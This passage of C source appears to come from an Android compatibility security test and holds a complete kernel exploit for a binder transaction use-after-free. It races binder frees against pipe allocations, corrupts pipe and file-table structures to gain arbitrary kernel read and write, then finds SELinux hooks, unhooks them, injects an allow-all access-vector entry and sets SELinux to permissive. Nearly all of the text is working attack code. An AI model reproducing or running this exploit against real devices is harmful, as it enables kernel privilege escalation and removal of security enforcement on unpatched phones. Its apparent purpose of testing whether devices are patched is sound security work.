979     return ((inst >> 24) & 0x9f) == 0x90;
980 }
981 
parse_adrp(u64 p,u32 inst)982 u64 parse_adrp(u64 p, u32 inst) {
983     s64 off = ((inst >> 5) & ((1u << 19) - 1)) << 2;
984     off |= (inst >> 29) & 3;
985     off <<= (64 - 21);
986     off >>= (64 - 21 - 12);
987     return (p & ~0xffful) + off;
988 }
989 
find_adrp_add(u64 addr)990 u64 find_adrp_add(u64 addr) {
991     time_t test_started = start_timer();
992     while (timer_active(test_started)) {
993         u32 inst = r32(addr);
994         if (is_adrp(inst)) {
995             u64 ret = parse_adrp(addr, inst);
996             inst = r32(addr + 4);
997             if ((inst >> 22) != 0x244) {
998                 fail("not add after adrp");
999                 return (u64)-1;
1000             }
1001             ret += (inst >> 10) & ((1u << 12) - 1);
1002             return ret;
1003         }
1004         addr += 4;
1005     }
1006     fail("adrp add not found");
1007     return (u64)-1;
1008 }
1009 
locate_hooks()1010 u64 locate_hooks() {
1011     char path[256];
1012     DIR *d = opendir("/proc/self/map_files");
1013     char *p;
1014     while (1) {
1015         struct dirent *l = readdir(d);
1016         if (!l)
1017             fail("readdir fail");
1018         p = l->d_name;
1019         if (strcmp(p, ".") && strcmp(p, ".."))
1020             break;
1021     }
1022     sprintf(path, "/proc/self/map_files/%s", p);
1023     closedir(d);
1024     int fd = open(path, O_PATH | O_NOFOLLOW | O_RDONLY);
1025     if (fd < 0)
1026         fail("link open fail");
1027     struct stat st;
1028     if (fstat(fd, &st) < 0)
1029         fail("fstat fail");
1030     if (!S_ISLNK(st.st_mode))
1031         fail("link open fail");
1032     u64 file = get_file(fd);
1033     u64 inode = r64(file + 0x20);
1034     u64 iop = r64(inode + 0x20);
1035     u64 follow_link = r64(iop + 8);
1036     u64 cap = first_bl(follow_link);
1037     u64 scap = first_bl(cap);
1038     if (cap == (u64)-1 || scap == (u64)-1) {
1039         dbg("cap=%016zx", cap);
1040         dbg("scap=%016zx", scap);
1041         return (u64)-1;
1042     }
1043     u64 hooks = find_adrp_add(scap);
1044     close(fd);
1045     dbg("hooks=%016zx", hooks);
1046     return hooks;
1047 }
1048 
unhook(u64 hooks,int idx)1049 void unhook(u64 hooks, int idx) {
1050     u64 hook = hooks + idx * 0x10;
1051     w128(hook, hook, hook);
1052 }
1053 
locate_avc(u64 hooks)1054 u64 locate_avc(u64 hooks) {
1055     u64 se_file_open = r64(r64(hooks + 0x490) + 0x18);
1056     u64 seqno = first_bl(se_file_open);
1057     if (seqno == (u64)-1) {
1058         dbg("seqno=%016zx", seqno);
1059         return (u64)-1;
1060     }
1061     u64 avc = find_adrp_add(seqno);
1062     dbg("avc=%016zx", avc);
1063     return avc;
1064 }
1065 
get_sid()1066 u32 get_sid() {
1067     u64 real_cred = r64(current + 0x788);
1068     u64 security = r64(real_cred + 0x78);
1069     u32 sid = r32(security + 4);
1070     dbg("sid=%u", sid);
1071     return sid;
1072 }
1073 
1074 struct avc_node {
1075     u32 ssid;
1076     u32 tsid;
1077     u16 tclass;
1078     u16 pad;
1079     u32 allowed;
1080 };
1081 
grant(u64 avc,u32 ssid,u32 tsid,u16 class)1082 u64 grant(u64 avc, u32 ssid, u32 tsid, u16 class) {
1083     struct avc_node n;
1084     n.ssid = ssid;
1085     n.tsid = tsid;
1086     n.tclass = class;
1087     n.pad = 0;
1088     n.allowed = ~0u;
1089     u64 node = scratch;
1090     for (int i = 0; i < 9; i++)
1091         w64(node + i * 8, 0);
1092     u64 *src = (u64*)&n;
1093     w64(node, src[0]);
1094     w64(node + 8, src[1]);
1095     int hash = (ssid ^ (tsid<<2) ^ (class<<4)) & 0x1ff;
1096     u64 head = avc + hash * 8;
1097     u64 hl = node + 0x28;
1098     u64 first = r64(head);
1099     w128(hl, first, head);
1100     if (first)
1101         w64(first + 8, hl);
1102     w64(head, hl);
1103     dbg("granted security sid");
1104     return hl;
1105 }
1106 
enforce()1107 int enforce() {
1108     int fd = open("/sys/fs/selinux/enforce", O_RDONLY);
1109     if (fd < 0)
1110         return 1;
1111     dbg("enforce=%d", fd);
1112     char buf;
1113     if (read(fd, &buf, 1) != 1)
1114         return 1;
1115     close(fd);
1116     return buf == '1';
1117 }
1118 
disable_enforce()1119 void disable_enforce() {
1120     int fd = open("/sys/fs/selinux/enforce", O_WRONLY);
1121     if (fd >= 0) {
1122         write(fd, "0", 1);
1123         close(fd);
1124     }
1125     if (enforce())
1126         fail("failed to switch selinux to permissive");
1127     dbg("selinux now permissive");
1128 }
1129 
disable_selinux()1130 void disable_selinux() {
1131     if (!enforce()) {
1132         dbg("selinux already permissive");
1133         return;
1134     }
1135     u64 hooks = locate_hooks();
1136     if (hooks == (u64)-1) {
1137         return;
1138     }
1139     u64 avc = locate_avc(hooks);
1140     if (avc == (u64)-1) {
1141         return;
1142     }
1143     unhook(hooks, 0x08); // capable
1144     unhook(hooks, 0x2f); // inode_permission
1145     unhook(hooks, 0x3d); // file_permission
1146     unhook(hooks, 0x49); // file_open
1147     u64 avcnode = grant(avc, get_sid(), 2, 1);
1148     disable_enforce();
1149     hlist_del(avcnode);
1150 }
1151 
1152 #define PIPES 8
1153 #define STAGE2_THREADS 64
1154 
1155 int cpumask;
1156 int cpu1;
1157 int cpu2;
1158 int tot_cpus;
1159 const char *pipedir;
1160 char *pipepath;
1161 char *pipeid;
1162 int pipefd[PIPES];
1163 sync_t *free_sync;
1164 sync_t *poll_sync;
1165 sync_t *stage2_sync1;
1166 sync_t *stage2_sync2;
1167 sync_t *rw_thread_sync;
1168 int bnd1, bnd2;
1169 u32 to1;
1170 u64 free_ptr;
1171 u64 trigger_time;
1172 int total_txns;
1173 int bad_pipe;
1174 int uaf_pipe;
1175 volatile int uaf_alloc_success;
1176 u64 pipe_inode_info;
1177 int rw_thread_tid;
1178 volatile int rw_cmd;
1179 volatile int rw_bit;
1180 volatile int rw_val;
1181 u64 free_data;
1182 u64 next_free_data;
1183 
select_cpus()1184 void select_cpus() {
1185     cpu1 = cpu2 = -1;
1186     for (int i = 7; i >= 0; i--) {
1187         if (do_set_cpu(i) < 0)
1188             continue;
1189         cpumask |= (1 << i);
1190         if (cpu1 < 0)
1191             cpu1 = i;
1192         else if (cpu2 < 0)
1193             cpu2 = i;
1194         tot_cpus++;
1195     }
1196     if (cpu1 < 0 || cpu2 < 0) {
1197         fail("huh, couldn't find 2 cpus");
1198     }
1199     dbg("cpumask=%02x cpu1=%d cpu2=%d", cpumask, cpu1, cpu2);
1200 }
1201 
1202 void rw_thread(u64 idx);
1203 void free_thread(u64 arg);
1204 void poll_thread(u64 arg);
1205 
cpu_available(int cpu)1206 int cpu_available(int cpu) {
1207     return !!(cpumask & (1 << cpu));
1208 }
1209 
hog_cpu_thread(u64 arg)1210 void hog_cpu_thread(u64 arg) {
1211     set_cpu(cpu2);
1212     time_t test_started = start_timer();
1213     while (timer_active(test_started)) {
1214     }
1215 }
1216 
launch_threads()1217 void launch_threads() {
1218     launch_thread("txnuaf.log", log_thread, NULL, 0, 1);
1219     launch_thread("txnuaf.hog", hog_cpu_thread, NULL, 0, 1);
1220     launch_thread("txnuaf.free", free_thread, &free_sync, 0, 1);
1221     launch_thread("txnuaf.poll", poll_thread, &poll_sync, 0, 1);
1222     rw_thread_tid = launch_thread("txnuaf.rw", rw_thread, &rw_thread_sync, 0, 0);
1223 }
1224 
open_binders()1225 void open_binders() {
1226     u32 xchg;
1227     bnd1 = get_binder(&xchg);
1228     exchg_put_binder(bnd1, xchg);
1229     dec_ref(bnd1, xchg);
1230     bnd2 = get_binder(&xchg);
1231     to1 = exchg_get_binder(bnd2, xchg);
1232     dec_ref(bnd1, xchg);
1233 }
1234 
make_pipe_path()1235 void make_pipe_path() {
1236     size_t l = strlen(pipedir);
1237     pipepath = malloc(l + 4); // "/pd\0"
1238     strcpy(pipepath, pipedir);
1239     pipepath[l++] = '/';
1240     pipeid = pipepath + l;
1241 }
1242 
open_pipe(int idx)1243 int open_pipe(int idx) {
1244     if (!pipepath)
1245         make_pipe_path();
1246     sprintf(pipeid, "p%d", idx);
1247     int fd = open(pipepath, O_RDWR);
1248     if (fd < 0)
1249         fail("pipe open fail");
1250     return fd;
1251 }
1252 
open_pipes()1253 void open_pipes() {
1254     for (int i = 0; i < PIPES; i++)
1255         pipefd[i] = open_pipe(i);
1256 }
1257 
do_poll(int fd,int timeout)1258 int do_poll(int fd, int timeout) {
1259     struct pollfd pfd;
1260     pfd.fd = fd;
1261     pfd.events = 0;
1262     pfd.revents = 0;
1263     if (poll(&pfd, 1, timeout) < 0)
1264         fail("pipe poll fail");
1265     return pfd.revents;
1266 }
1267 
find_bad_pipe()1268 int find_bad_pipe() {
1269     for (int i = 0; i < PIPES; i++) {
1270         if (do_poll(pipefd[i], 0) & POLLHUP) {
1271             dbg("corrupted pipe at %d", i);
1272             bad_pipe = pipefd[i];
1273             sprintf(pipeid, "p%d", i);
1274             return 1;
1275         }
1276     }
1277     return 0;
1278 }
1279 
close_pipes()1280 void close_pipes() {
1281     for (int i = 0; i < PIPES; i++) {
1282         if (close(pipefd[i]) < 0)
1283             fail("close pipe fail, i=%d fd=%d", i, pipefd[i]);
1284     }
1285 }
1286 
free_thread(u64 arg)1287 void free_thread(u64 arg) {
1288     set_timerslack();
1289     set_cpu(cpu1);
1290     set_idle();
1291     time_t test_started = start_timer();
1292     while (timer_active(test_started)) {
1293         sync_wait(free_sync);
1294         buf_t *buf = new_buf();
1295         buf_u32(buf, BC_FREE_BUFFER);
1296         buf_uintptr(buf, free_ptr);
1297         struct binder_write_read bwr;
1298         memset(&bwr, 0x00, sizeof(bwr));
1299         bwr.write_buffer = (u64)buf->p;
1300         bwr.write_size = buf->off;
1301         int off = cpu1 < 4 ? 1300 : 350;
1302         u64 target_time = trigger_time - off;
1303         while (time_now() < target_time)
1304             ;
1305         ioctl(bnd1, BINDER_WRITE_READ, &bwr);
1306         free_buf(buf);
1307         sync_done(free_sync);
1308     }
1309 };
1310 
race_cycle()1311 void race_cycle() {
1312     dbg("race cycle, this may take time...");
1313     time_t test_started = start_timer();
1314     while (timer_active(test_started)) {
1315         send_txn(bnd2, to1, 0, NULL, NULL);
1316         txn_t t1, t2;
1317         recv_txn(bnd1, &t1);
1318         free_ptr = txn_buf(&t1);
1319         trigger_time = time_now() + 100000;
1320         sync_signal(free_sync);
1321         sleep_until(trigger_time);
1322         send_reply(bnd1);
1323         open_pipes();
1324         recv_txn(bnd2, &t2);
1325         free_txn(&t2);
1326         sync_wait_done(free_sync);
1327         if (find_bad_pipe())
1328             break;
1329         close_pipes();
1330     }
1331 }
1332 
reopen_pipe()1333 void reopen_pipe() {
1334     uaf_pipe = open(pipepath, O_WRONLY);
1335     if (uaf_pipe < 0)
1336         fail("reopen pipe fail");
1337 }
1338 
1339 void stage2_thread(u64 cpu);
1340 
stage2_launcher(u64 arg)1341 void stage2_launcher(u64 arg) {
1342     dup2(uaf_pipe, 0);
1343     dup2(bnd1, 1);
1344     dup2(bnd2, 2);
1345     for (int i = 3; i < 1024; i++)
1346         close(i);
1347     unshare_following_clone_files();
1348     int cpu_count =  android_getCpuCount();
1349     for (int cpu = 0; cpu < cpu_count; cpu++) {
1350         if (cpu_available(cpu)) {
1351             for (int i = 0; i < STAGE2_THREADS; i++)
1352                 launch_thread("txnuaf.stage2", stage2_thread, NULL, cpu, 0);
1353         }
1354     }
1355 }
1356 
signal_xpl_threads()1357 void signal_xpl_threads() {
1358     sync_signal(stage2_sync1);
1359     sync_wait_done(stage2_sync1);
1360     sync_signal(stage2_sync2);
1361     sync_wait_done(stage2_sync2);
1362 }
1363 
launch_stage2_threads()1364 void launch_stage2_threads() {
1365     stage2_sync1 = alloc_sync();
1366     stage2_sync2 = alloc_sync();
1367     sync_set_num_waiters(stage2_sync1, STAGE2_THREADS);
1368     sync_set_num_waiters(stage2_sync2, (tot_cpus - 1) * STAGE2_THREADS);
1369     hook_clone();
1370     unshare_following_clone_files();
1371     launch_thread("txnuaf.stage2_launcher", stage2_launcher, NULL, 0, 0);
1372     // set cpu
1373     signal_xpl_threads();
1374 }
1375 
alloc_txns(int n)1376 void alloc_txns(int n) {
1377     total_txns += n;
1378     size_t totsz = n * (4 + sizeof(struct binder_transaction_data));
1379     buf_t *buf = new_buf_sz(totsz);
1380     for (int i = 0; i < n; i++) {
1381         buf_u32(buf, BC_TRANSACTION);
1382         struct binder_transaction_data *tr;
1383         tr = buf_alloc(buf, sizeof(*tr));
1384         tr->target.handle = to1;
1385         tr->code = 0;
1386         tr->flags |= TF_ONE_WAY;
1387         tr->data.ptr.buffer = 0;
1388         tr->data.ptr.offsets = 0;
1389         tr->data_size = 0;
1390         tr->offsets_size = 0;
1391     }
1392     binder_write(bnd2, buf);
1393 }
1394 
recv_all_txns(int fd)1395 void recv_all_txns(int fd) {
1396     for (int i = 0; i < total_txns; i++) {
1397         txn_t t;
1398         recv_txn(fd, &t);
1399         free_txn(&t);
1400     }
1401 }
1402 
clean_slab()1403 void clean_slab() {
1404     // clean node
1405     alloc_txns(4096);
1406     // clean each cpu
1407     int cpu_count =  android_getCpuCount();
1408     for (int i = 0; i < cpu_count; i++) {
1409         if (cpu_available(i)) {
1410             set_cpu(i);
1411             alloc_txns(512);
1412         }
1413     }
1414     set_cpu(cpu1);
1415     // for good measure
1416     alloc_txns(128);
1417 }
1418 
poll_thread(u64 arg)1419 void poll_thread(u64 arg) {
1420     set_timerslack();
1421     sync_wait(poll_sync);
1422     do_poll(uaf_pipe, 200);
1423     dbg("poll timeout");
1424     sync_done(poll_sync);
1425 }
1426 
free_pipe_alloc_fdmem()1427 void free_pipe_alloc_fdmem() {
1428     clean_slab();
1429     sync_signal(poll_sync);
1430     usleep(50000);
1431     if (close(bad_pipe) < 0) {
1432         fail("free close fail");
1433         return;
1434     }
1435     // alloc fdmem
1436     signal_xpl_threads();
1437     // set all bits
1438     signal_xpl_threads();
1439     dbg("fdmem spray done");
1440     sync_wait_done(poll_sync);
1441     recv_all_txns(bnd1);
1442 }
1443 
find_pipe_slot_thread()1444 void find_pipe_slot_thread() {
1445     signal_xpl_threads();
1446     if (!uaf_alloc_success)
1447         fail("inode_info uaf alloc fail - this may sometimes happen, "
1448              "kernel may crash after you close the app");
1449 }
1450 
set_all_bits()1451 void set_all_bits() {
1452     for (int i = 0x1ff; i >= 3; i--)
1453         if (dup2(1, i) < 0)
1454             fail("dup2 fail, fd=%d", i);
1455 }
1456 
winfo32_lo(int addr,u32 dat)1457 void winfo32_lo(int addr, u32 dat) {
1458     int startbit = addr ? 0 : 3;
1459     addr *= 8;
1460     for (int i = startbit; i < 32; i++) {
1461         int fd = addr + i;
1462         if (dat & (1ul << i)) {
1463             if (dup2(1, fd) < 0)
1464                 fail("winfo dup2 fail, fd=%d", fd);
1465         } else {
1466             if (close(fd) < 0 && errno != EBADF)
1467                 fail("winfo close fail, fd=%d", fd);
1468         }
1469     }
1470 }
1471 
winfo32_hi(int addr,u32 dat)1472 void winfo32_hi(int addr, u32 dat) {
1473     addr *= 8;
1474     for (int i = 0; i < 32; i++) {
1475         u32 bit = dat & (1u << i);
1476         int fd = addr + i;
1477         if (fcntl(fd, F_SETFD, bit ? FD_CLOEXEC : 0) < 0) {
1478             if (errno != EBADF || bit)
1479                 fail("winfo fcntl fail fd=%d", fd);
1480         }
1481     }
1482 }
1483 
winfo32(int addr,u32 dat)1484 void winfo32(int addr, u32 dat) {
1485     if (addr < 0x40)
1486         winfo32_lo(addr, dat);
1487     else
1488         winfo32_hi(addr - 0x40, dat);
1489 }
1490 
winfo64(int addr,u64 dat)1491 void winfo64(int addr, u64 dat) {
1492     winfo32(addr, dat);
1493     winfo32(addr + 4, dat >> 32);
1494 }
1495 
rinfo64(int addr)1496 u64 rinfo64(int addr) {
1497     addr *= 8;
1498     u64 ret = 0;
1499     for (int i = 0; i < 64; i++) {
1500         int fd = addr + i;
1501         fd_set set;
1502         FD_ZERO(&set);
1503         FD_SET(fd, &set);
1504         struct timeval timeout;
1505         timeout.tv_sec = 0;
1506         timeout.tv_usec = 0;
1507         if (select(fd + 1, &set, NULL, NULL, &timeout) >= 0)
1508             ret |= 1ul << i;
1509         else if (errno != EBADF)
1510             fail("leak select fail");
1511     }
1512     return ret;
1513 }
1514 
1515 int files_off = 0x30;
1516 int file_off = 0x48;
1517 int fdt_off = 0x58;
1518 int fmode_off = 0x78;
1519 int faoff = 0x10;
1520 
set_pipe_mutex_count(u32 count)1521 void set_pipe_mutex_count(u32 count) {
1522     winfo32(0, count);
1523 }
1524 
set_pipe_nrbufs(u32 nrbufs)1525 void set_pipe_nrbufs(u32 nrbufs) {
1526     winfo32(0x40, nrbufs);
1527 }
1528 
set_pipe_curbuf(u32 curbuf)1529 void set_pipe_curbuf(u32 curbuf) {
1530     winfo32(0x44, curbuf);
1531 }
1532 
set_pipe_buffers(u32 buffers)1533 void set_pipe_buffers(u32 buffers) {
1534     winfo32(0x48, buffers);
1535 }
1536 
set_pipe_readers(u32 readers)1537 void set_pipe_readers(u32 readers) {
1538     winfo32(0x4c, readers);
1539 }
1540 
set_pipe_fasync_readers(u64 fasync_readers)1541 void set_pipe_fasync_readers(u64 fasync_readers) {
1542     winfo64(0x70, fasync_readers);
1543 }
1544 
set_pipe_wait_next(u64 next)1545 void set_pipe_wait_next(u64 next) {
1546     winfo64(0x30, next);
1547 }
1548 
get_pipe_wait_next()1549 u64 get_pipe_wait_next() {
1550     return rinfo64(0x30);
1551 }
1552 
set_fa_magic(u32 magic)1553 void set_fa_magic(u32 magic) {
1554     winfo32(faoff + 4, magic);
1555 }
1556 
set_fa_next(u64 next)1557 void set_fa_next(u64 next) {
1558     winfo64(faoff + 0x10, next);
1559 }
1560 
set_fa_file(u64 file)1561 void set_fa_file(u64 file) {
1562     winfo64(faoff + 0x18, file);
1563 }
1564 
get_mutex_owner()1565 u64 get_mutex_owner() {
1566     return rinfo64(0x18);
1567 }
1568 
set_files_count(int count)1569 void set_files_count(int count) {
1570     winfo32(files_off, count);
1571 }
1572 
set_files_fdt(u64 fdt)1573 void set_files_fdt(u64 fdt) {
1574     winfo64(files_off + 0x20, fdt);
1575 }
1576 
set_fdt_max_fds(u32 max_fds)1577 void set_fdt_max_fds(u32 max_fds) {
1578     winfo32(fdt_off, max_fds);
1579 }
1580 
set_fdt_fdarr(u64 fdarr)1581 void set_fdt_fdarr(u64 fdarr) {
1582     winfo64(fdt_off + 8, fdarr);
1583 }
1584 
set_fdt_close_on_exec(u64 close_on_exec)1585 void set_fdt_close_on_exec(u64 close_on_exec) {
1586     winfo64(fdt_off + 0x10, close_on_exec);
1587 }
1588 
set_file_fmode(u32 fmode)1589 void set_file_fmode(u32 fmode) {
1590     winfo32(fmode_off, fmode);
1591 }
1592 
set_file(u64 file)1593 void set_file(u64 file) {
1594     winfo64(file_off, file);
1595 }
1596 
1597 void stage2();
1598 
stage2_thread(u64 cpu)1599 void stage2_thread(u64 cpu) {
1600     sync_t *sync = cpu == cpu1 ? stage2_sync1 : stage2_sync2;
1601     sync_wait(sync);
1602     do_set_cpu(cpu);
1603     sync_done(sync);
1604 
1605     sync_wait(sync);
1606     if (dup2(1, 0x1ff) < 0) {
1607         fail("dup2 fail");
1608         return;
1609     }
1610     sync_done(sync);
1611 
1612     sync_wait(sync);
1613     set_all_bits();
1614     sync_done(sync);
1615 
1616     sync_wait(sync);
1617     u64 wait_list = get_pipe_wait_next();
1618     int ok = wait_list != -1l;
1619     if (ok) {
1620         uaf_alloc_success = 1;
1621         pipe_inode_info = wait_list - 0x30;
1622         dbg("pipe_inode_info=%016zx", pipe_inode_info);
1623     }
1624     sync_done(sync);
1625     if (ok)
1626         stage2();
1627 }
1628 
write_pipe_ptr_to(u64 addr)1629 void write_pipe_ptr_to(u64 addr) {
1630     set_pipe_wait_next(addr - 8);
1631     do_poll(0, 50);
1632 }
1633 
overwrite_pipe_bufs()1634 void overwrite_pipe_bufs() {
1635     write_pipe_ptr_to(pipe_inode_info + 0x80);
1636 }
1637 
leak_task_ptr()1638 void leak_task_ptr() {
1639     set_pipe_mutex_count(0x7);
1640     set_pipe_wait_next(pipe_inode_info + 0x30);
1641     u64 faptr = pipe_inode_info + faoff;
1642     set_pipe_fasync_readers(faptr);
1643     set_pipe_nrbufs(3);
1644     set_pipe_curbuf(0);
1645     set_pipe_buffers(4);
1646     set_pipe_readers(1);
1647     set_fa_magic(0x4601);
1648     set_fa_next(faptr);
1649     set_fa_file(0xfffffffful); // overlaps with inode_info.wait.lock
1650     sync_signal(rw_thread_sync);
1651     // wait for rw thread to write mutex owner
1652     usleep(100000);
1653     rw_task = get_mutex_owner();
1654     dbg("rw_task=%016zx", rw_task);
1655     // unblock rw thread
1656     set_fa_magic(0);
1657     if (syscall(SYS_tkill, rw_thread_tid, SIGUSR2) < 0)
1658         fail("tkill fail");
1659     dbg("signaled rw_thread");
1660     sync_wait_done(rw_thread_sync);
1661     // wait until klogd has logged the bad magic number error
1662     sleep(1);
1663 }
1664 
overwrite_task_files(u64 task)1665 void overwrite_task_files(u64 task) {
1666     write_pipe_ptr_to(task + 0x7c0);
1667 }
1668 
sigfunc(int a)1669 void sigfunc(int a) {
1670 }
1671 
1672 enum {cmd_read, cmd_write, cmd_exit};
1673 
handle_sig()1674 void handle_sig() {
1675     struct sigaction sa;
1676     memset(&sa, 0x00, sizeof(sa));
1677     sa.sa_handler = sigfunc;
1678     if (sigaction(SIGUSR2, &sa, NULL) < 0)
1679         fail("sigaction fail");
1680 }
1681 
rw_thread(u64 idx)1682 void rw_thread(u64 idx) {
1683     handle_sig();
1684     sync_wait(rw_thread_sync);
1685     void *dat = malloc(0x2000);
1686     dbg("starting blocked write");
1687     if (write(uaf_pipe, dat, 0x2000) != 0x1000) {
1688         fail("expected blocking write=0x1000");
1689         return;
1690     }
1691     dbg("write unblocked");
1692     sync_done(rw_thread_sync);
1693     int done = 0;
1694     while (!done) {
1695         sync_wait(rw_thread_sync);
1696         if (rw_cmd == cmd_read) {
1697             int bits = fcntl(rw_bit, F_GETFD);
1698             if (bits < 0) {
1699                 fail("F_GETFD fail");
1700                 return;
1701             }
1702             rw_val = !!(bits & FD_CLOEXEC);
1703         } else if (rw_cmd == cmd_write) {
1704             if (fcntl(rw_bit, F_SETFD, rw_val ? FD_CLOEXEC : 0) < 0) {
1705                 fail("F_SETFD fail");
1706                 return;
1707             }
1708         } else {
1709             done = 1;
1710         }
1711         sync_done(rw_thread_sync);
1712     }
1713 }
1714 
set_fdarr(int bit)1715 void set_fdarr(int bit) {
1716     set_fdt_fdarr(pipe_inode_info + file_off - bit * 8);
1717 }
1718 
r8(u64 addr)1719 u8 r8(u64 addr) {
1720     u8 val = 0;
1721     set_fdt_close_on_exec(addr);
1722     for (int bit = 0; bit < 8; bit++) {
1723         set_fdarr(bit);
1724         rw_bit = bit;
1725         rw_cmd = cmd_read;
1726         sync_signal(rw_thread_sync);
1727         sync_wait_done(rw_thread_sync);
1728         val |= rw_val << bit;
1729     }
1730     return val;
1731 }
1732 
w8(u64 addr,u8 val)1733 void w8(u64 addr, u8 val) {
1734     set_fdt_close_on_exec(addr);
1735     for (int bit = 0; bit < 8; bit++) {
1736         set_fdarr(bit);
1737         rw_bit = bit;
1738         rw_val = val & (1 << bit);
1739         rw_cmd = cmd_write;
1740         sync_signal(rw_thread_sync);
1741         sync_wait_done(rw_thread_sync);
1742     }
1743 }
1744 
exit_rw_thread()1745 void exit_rw_thread() {
1746     rw_cmd = cmd_exit;
1747     sync_signal(rw_thread_sync);
1748     sync_wait_done(rw_thread_sync);
1749 }
1750 
w16(u64 addr,u16 val)1751 void w16(u64 addr, u16 val) {
1752     w8(addr, val);
1753     w8(addr + 1, val >> 8);
1754 }
1755 
w32(u64 addr,u32 val)1756 void w32(u64 addr, u32 val) {
1757     w16(addr, val);
1758     w16(addr + 2, val >> 16);
1759 }
1760 
w64(u64 addr,u64 val)1761 void w64(u64 addr, u64 val) {
1762     w32(addr, val);
1763     w32(addr + 4, val >> 32);
1764 }
1765 
r16(u64 addr)1766 u16 r16(u64 addr) {
1767     return r8(addr) | (r8(addr + 1) << 8);
1768 }
1769 
r32(u64 addr)1770 u32 r32(u64 addr) {
1771     return r16(addr) | (r16(addr + 2) << 16);
1772 }
1773 
r64(u64 addr)1774 u64 r64(u64 addr) {
1775     return r32(addr) | (u64)r32(addr + 4) << 32;
1776 }
1777 
1778 #define magic 0x55565758595a5b5cul
1779 
set_up_arbitrary_rw()1780 void set_up_arbitrary_rw() {
1781     overwrite_task_files(rw_task);
1782     set_all_bits();
1783     set_files_count(1);
1784     set_files_fdt(pipe_inode_info + fdt_off);
1785     set_fdt_max_fds(8);
1786     set_file(pipe_inode_info + fmode_off - 0x44);
1787     set_file_fmode(0);
1788     u64 magic_addr = scratch;
1789     w64(magic_addr, magic);
1790     if (r64(magic_addr) != magic)
1791         fail("rw test fail");
1792     dbg("got arbitrary rw");
1793 }
1794 
get_current()1795 u64 get_current() {
1796     int our_tid = gettid();
1797     u64 leader = r64(rw_task + 0x610);
1798     u64 task = leader;
1799 
1800     time_t test_started = start_timer();
1801     while (timer_active(test_started)) {
1802         int tid = r32(task + 0x5d0);
1803         if (tid == our_tid)
1804             return task;
1805         task = r64(task + 0x680) - 0x680;
1806         if (task == leader)
1807             break;
1808     }
1809     fail("current not found");
1810     return (u64)-1;
1811 }
1812 
get_fdarr()1813 void get_fdarr() {
1814     current = get_current();
1815     if (current == (u64)-1) {
1816         return;
1817     }
1818     dbg("current=%016zx", current);
1819     u64 files = r64(current + 0x7c0);
1820     u64 fdt = r64(files + 0x20);
1821     fdarr = r64(fdt + 8);
1822 }
1823 
place_bnd_buf(u64 v1,u64 v2,txn_t * t)1824 void place_bnd_buf(u64 v1, u64 v2, txn_t *t) {
1825     txn_t t2;
1826     int do_free = !t;
1827     if (!t)
1828         t = &t2;
1829     buf_t *dat = new_buf();
1830     buf_u64(dat, v1);
1831     buf_u64(dat, v2);
1832     send_txn(2, to1, 0, dat, NULL);
1833     recv_txn(1, t);
1834     if (do_free)
1835         free_txn(t);
1836     send_reply(1);
1837     recv_txn(2, &t2);
1838     free_txn(&t2);
1839 }
1840 
w128(u64 addr,u64 v1,u64 v2)1841 void w128(u64 addr, u64 v1, u64 v2) {
1842     w64(free_data, addr);
1843     w64(next_free_data, addr + 0x10);
1844     place_bnd_buf(v1, v2, NULL);
1845 }
1846 
set_up_w128()1847 void set_up_w128() {
1848     u64 bnd = get_file(1);
1849     u64 proc = r64(bnd + 0xd0);
1850     u64 alloc = proc + 0x1c0;
1851     enter_looper(1);
1852     txn_t t1, t2;
1853     place_bnd_buf(0, 0, &t1);
1854     place_bnd_buf(0, 0, &t2);
1855     free_txn(&t1);
1856     u64 free_buffer = r64(alloc + 0x48);
1857     u64 next = r64(free_buffer);
1858     w64(alloc + 0x38, 0);
1859     w64(alloc + 0x78, ~0ul);
1860     free_data = free_buffer + 0x58;
1861     next_free_data = next + 0x58;
1862     u64 magic_addr = scratch + 8;
1863     w128(magic_addr, magic, magic);
1864     if (r64(magic_addr) != magic || r64(magic_addr + 8) != magic)
1865         fail("w128 test fail");
1866     dbg("got w128");
1867 }
1868 
clean_up()1869 void clean_up() {
1870     w64(fdarr, 0);
1871     set_files_count(2);
1872     exit_rw_thread();
1873 }
1874 
exploit()1875 void exploit() {
1876     set_thread_name("txnuaf");
1877     select_cpus();
1878     set_cpu(cpu1);
1879     set_timerslack();
1880     launch_threads();
1881     open_binders();
1882     race_cycle();
1883     reopen_pipe();
1884     launch_stage2_threads();
1885     free_pipe_alloc_fdmem();
1886     find_pipe_slot_thread();
1887 }
1888 
stage2()1889 void stage2() {
1890     scratch = pipe_inode_info + 0xb8;
1891     overwrite_pipe_bufs();
1892     leak_task_ptr();
1893     set_up_arbitrary_rw();
1894     get_fdarr();
1895     set_up_w128();
1896     winfo32(0, 0x7);
1897     disable_selinux();
1898     clean_up();
1899 }
1900 
1901 JNIEXPORT void JNICALL
Java_android_security_cts_ExploitThread_runxpl(JNIEnv * e,jobject t,jstring jpipedir)1902 Java_android_security_cts_ExploitThread_runxpl(JNIEnv *e, jobject t, jstring jpipedir) {
1903     this = (*e)->NewGlobalRef(e, t);
1904     add_jenv(e);
1905     (*e)->GetJavaVM(e, &jvm);
1906     jclass cls = (*e)->GetObjectClass(e, this);
1907     add_log = (*e)->GetMethodID(e, cls, "addLog", "(Ljava/lang/String;)V");
1908     pipedir = (*e)->GetStringUTFChars(e, jpipedir, NULL);
1909     exploit();
1910     (*e)->ReleaseStringUTFChars(e, jpipedir, pipedir);
1911 }
1912